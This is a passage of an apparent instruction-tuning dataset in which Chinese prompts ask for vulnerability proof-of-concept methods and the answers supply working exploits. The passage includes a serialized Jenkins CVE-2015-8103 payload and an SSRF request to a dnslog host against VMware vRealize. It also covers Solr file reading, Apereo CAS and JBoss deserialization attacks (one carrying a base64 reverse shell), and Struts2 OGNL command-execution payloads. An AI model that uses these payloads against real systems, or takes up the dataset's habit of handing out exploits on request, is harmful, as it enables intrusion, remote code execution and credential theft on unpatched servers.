\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\n\nsock.send(payload)\nprint('[+] Sent payload')\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md"}
    192. 

  192. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975\n漏洞描述:vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。\n影响版本:``` VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 VMware:cloud_foundation: 4.x 3.x VMware:vRealize_suite_lifecycle_manager: 8.x ```\n网络测绘:``` title=\"vRealize Operations Manager\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-21975\n【POC利用方法】\n1. VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0\nVMware:cloud_foundation: 4.x 3.x\nVMware:vRealize_suite_lifecycle_manager: 8.x\n2. title=\"vRealize Operations Manager\"\n3. POST /casa/nodes/thumbprints HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Type: application/json;charset=UTF-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nContent-Length: 24\n\n\n[\"eheeyd.dnslog.cn\"]\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975.md"}
    193. 

  193. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr stream.url 任意文件读取漏洞\n漏洞描述:Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 参考链接: - Apache Solr 组件安全概览 https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ - https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ\n影响版本:``` Apache Solr <= 8.8.1 ```\n网络测绘:``` title=\"Solr Admin\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. Apache Solr <= 8.8.1\n2. title=\"Solr Admin\"\n3. http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr stream.url 任意文件读取漏洞.md"}
    194. 

  194. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞\n漏洞描述:Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 参考链接: - https://apereo.github.io/2016/04/08/commonsvulndisc/\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. public class EncryptedTranscoder implements Transcoder {\n    private CipherBean cipherBean;\n    private boolean compression = true;\n\n    public EncryptedTranscoder() throws IOException {\n        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();\n        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec(\"AES\", \"CBC\", \"PKCS7\"));\n        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());\n        bufferedBlockCipherBean.setKeyAlias(\"aes128\");\n        bufferedBlockCipherBean.setKeyPassword(\"changeit\");\n        bufferedBlockCipherBean.setNonce(new RBGNonce());\n        this.setCipherBean(bufferedBlockCipherBean);\n    }\n\n    // ...\n3. java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 \"touch /tmp/awesome_poc\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apereo CAS 4.1 反序列化命令执行漏洞.md"}
    195. 

  195. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149\n漏洞描述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 参考: - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg - https://access.redhat.com/security/cve/cve-2017-12149\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12149\n【POC利用方法】\n1. docker-compose up -d\n2. java -jar ysoserial.jar CommonsCollections5 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}\" > poc.ser\n3. 生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md"}
    196. 

  196. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-016 远程代码执行漏洞 CVE-2013-2251\n漏洞描述:在struts2中,DefaultActionMapper类支持以\"action:\"、\"redirect:\"、\"redirectAction:\"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 漏洞详情: - http://struts.apache.org/docs/s2-016.html - http://www.freebuf.com/articles/web/25337.html\n影响版本:影响版本: 2.0.0 - 2.3.15\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2013-2251\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. redirect:${#context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,#f=#_memberAccess.getClass().getDeclaredField(\"allowStaticMethodAccess\"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec(\"uname -a\").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}\n3. redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-016 远程代码执行漏洞 CVE-2013-2251.md"}
    197. 

